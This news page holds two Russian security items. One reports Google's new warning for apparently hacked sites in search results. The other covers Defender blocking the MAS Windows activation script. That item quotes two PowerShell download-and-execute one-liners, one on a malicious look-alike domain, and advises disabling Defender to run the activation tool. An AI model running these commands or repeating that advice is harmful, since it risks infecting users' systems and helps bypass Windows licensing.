Google защитит пользователей от взломанных сайтов

Google защитит пользователей от взломанных сайтов

Поисковый гигант добавит в выдачу новый вид уведомлений для пользователей. Теперь посетители будут получать предупреждения не только о возможном наличии вредоносного программного обеспечения на том или ином ресурсе, но и о вероятной компрометации веб-сайта.



Если появившийся в результатах поиска узел Интернета будет классифицирован как оказавшийся жертвой хакеров, под ссылкой на него появится фраза "Возможно, этот сайт взломан". Напомним, что для ресурсов, которые являются источником инфекций, аналогичное предупреждение звучит как "Этот сайт может нанести вред вашему компьютеру".


Отчасти введение нового контура защиты обусловлено необходимостью противодействия "темным" методикам продвижения ресурсов в выдаче поисковых систем (black SEO). Такие приемы часто используются киберпреступниками, желающими заманить жертву на опасные сайты: ведь чем выше ресурс будет стоять в выдаче поисковика, тем выше окажется и шанс, что пользователь его посетит.


Представитель Google Гидеон Уэлд отметил в блоге, что расширение спектра уведомлений должно помочь посетителям избежать излишне близкого знакомства с сайтами, содержимое которых могло быть подвергнуто вредоносной модификации.


"Мы хотим, чтобы пользователь, открывая узел Интернета в своем обозревателе, был уверен, что представленные на страницах этого сайта сведения подлинны и предоставлены исключительно владельцем ресурса, а не взломщиками и спамерами", - говорится в сообщении г-на Уэлда. - "Нажав на строку с предупреждением, вы сможете ознакомиться с подробной информацией; если же вы все же желаете перейти на потенциально опасный ресурс, просто нажмите на основную ссылку в выдаче".


Также представитель компании вкратце разъяснил принцип работы нового механизма защиты. По его словам, вынесением соответствующих вердиктов будет заниматься автоматический анализатор, оценивающий ресурсы по определенному набору признаков и выдающий предупреждение в случае, если найдено что-то подозрительное. Обнаружив вероятный взлом, Google предпримет попытку связаться с администратором Интернет-узла - либо по электронным адресам, указанным на страницах ресурса, либо через учетную запись в сервисе "Инструменты Google для веб-мастеров", если таковая имеется.


Точные критерии детектирования взлома г-н Уэлд раскрывать не стал, но пообещал, что администраторы вероятно скомпрометированных сайтов смогут оформить запрос на пересмотр вердикта. Если Google убедится, что узел в порядке, предупреждение об угрозе исчезнет через несколько дней.


eWeek

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru